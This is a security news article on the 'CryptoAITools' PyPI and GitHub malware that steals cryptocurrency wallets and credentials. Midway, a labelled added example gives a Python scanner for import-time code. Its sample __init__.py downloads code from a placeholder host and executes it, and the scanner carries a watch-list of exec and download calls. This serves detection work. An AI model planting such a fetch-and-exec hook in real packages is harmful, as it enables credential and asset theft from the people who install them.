Cybersecurity researchers have discovered a new malicious Python package that masquerades as a cryptocurrency trading tool, but contains functionality designed to steal sensitive data and siphon assets from victims’ crypto wallets.
A package called “CryptoAITools” is said to have been distributed through both the Python Package Index (PyPI) and fake GitHub repositories. It was downloaded over 1300 times before being taken down by PyPI.
“The malware activated automatically upon installation and targeted both Windows and macOS operating systems,” according to a new Checkmarx report published on The Hacker News. “A deceptive graphical user interface (GUI) was used to distract victims while the malware executed its malicious activities in the background.”
The package triggers its malicious behavior immediately after installation through code placed in its “__init__.py” file, which first determines whether the host is Windows or macOS so that the matching variant of the malware is run.
A helper function in the code is responsible for fetching and executing additional payloads, turning the infection into a multi-stage process.
Specifically, the payloads are downloaded from a fake site (“coinsw(.)app”) that advertises a cryptocurrency trading bot service; the site exists to lend the domain an appearance of legitimacy should a developer visit it directly in a web browser.
This approach not only helps the threat actor avoid detection, but also lets them extend the malware’s capabilities at will simply by modifying the payloads hosted on what looks like a legitimate website.
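The defensive counterpart to the behaviour just described is to look, before importing an untrusted package, for code that runs at import time. The following is an added example, not code from the article or from Checkmarx: a small AST scanner that walks the module-level statements of an `__init__.py`, follows any same-file helper called from module level, and reports OS probes and download/exec calls reachable on import. The watch-lists, the placeholder URL and the sample `__init__.py` are constructed for the example.

```python
import ast

# Heuristic watch-lists (assumption: a starting point, not a complete list).
SUSPICIOUS_CALLS = {
    "exec", "eval", "urlopen", "urllib.request.urlopen",
    "requests.get", "os.system", "subprocess.run", "subprocess.Popen",
}
PLATFORM_PROBES = {"platform.system", "sys.platform", "os.name"}


def _dotted(node):
    """Turn a Name/Attribute chain such as urllib.request.urlopen into a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_init(source):
    """Return sorted (lineno, finding, reached_via) for code reachable on import.

    Module-level statements execute on import; a module-level call into a
    function defined in the same file is followed, so a helper that downloads
    and executes a payload is caught even though the download is not top level.
    """
    tree = ast.parse(source)
    funcs = {n.name: n for n in tree.body if isinstance(n, ast.FunctionDef)}
    findings, seen = [], set()

    def visit(stmts, via):
        for stmt in stmts:
            if isinstance(stmt, (ast.FunctionDef, ast.ClassDef, ast.Import, ast.ImportFrom)):
                continue  # definitions only; nothing runs here on import
            for node in ast.walk(stmt):
                if isinstance(node, ast.Attribute) and _dotted(node) in PLATFORM_PROBES:
                    findings.append((node.lineno, "platform probe: " + _dotted(node), via))
                elif isinstance(node, ast.Call):
                    name = _dotted(node.func)
                    if name in SUSPICIOUS_CALLS:
                        findings.append((node.lineno, "call: " + name, via))
                    elif name in funcs and name not in seen:
                        seen.add(name)
                        visit(funcs[name].body, name)  # follow into the helper

    visit(tree.body, "<module>")
    return sorted(findings)


# Constructed sample mirroring the pattern described above; the URL is a
# placeholder and nothing here is ever executed, only parsed.
SAMPLE_INIT = '''
import platform
import urllib.request

def _fetch_and_run(name):
    code = urllib.request.urlopen("https://example.invalid/" + name).read()
    exec(code)

def trade():            # the advertised, benign-looking API
    return "trading..."

if platform.system() == "Windows":
    _fetch_and_run("win")
else:
    _fetch_and_run("mac")
'''

if __name__ == "__main__":
    for lineno, what, via in scan_init(SAMPLE_INIT):
        print(f"line {lineno}: {what} (reached via {via})")
```

The `trade` function is never reported because nothing calls it at import time; only the branch that runs on import and the helper it reaches are flagged.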
A notable aspect of the infection process is the inclusion of a GUI component that serves to distract victims with a fake installation process while the malware secretly collects sensitive data from systems.
“CryptoAITools malware conducts a widespread data theft operation, targeting a wide range of sensitive information on an infected system,” Checkmarx said. “The primary goal is to collect any data that could assist an attacker in stealing cryptocurrency assets.”
This includes data from cryptocurrency wallets (Bitcoin, Ethereum, Exodus, Atomic, Electrum, etc.), saved passwords, cookies, browsing history, cryptocurrency browser extensions, SSH keys, files in the Downloads, Documents, and Desktop directories that relate to cryptocurrencies, passwords, or financial information, and Telegram data.
On Apple macOS machines, the malware also collects data from Apple’s Notes and Stickies apps. The collected information is finally uploaded to the gofile(.)io file transfer service, after which the local copy is deleted.
Checkmarx said it also discovered the same malware being distributed via a GitHub repository called “Meme-Token-Hunter-Bot”, which claims to be “an AI-powered trading bot that lists all meme tokens on the Solana network and executes real-time trades once they are deemed safe.”
This suggests that the threat actor is also targeting cryptocurrency users who choose to clone and run code directly from GitHub. The repository, which is still active at the time of writing, has been forked once and starred 10 times.
The operators also run a Telegram channel promoting the aforementioned GitHub repository, as well as offering monthly subscriptions and technical support.
“This cross-platform approach allows an attacker to cast a wide net, potentially reaching victims who may be wary of one platform but trust another,” Checkmarx said.
“The CryptoAITools malware campaign has serious implications for victims and the broader cryptocurrency community. Users who have starred or forked the “Meme-Token-Hunter-Bot” malicious repository are potential victims, greatly expanding the reach of the attack.”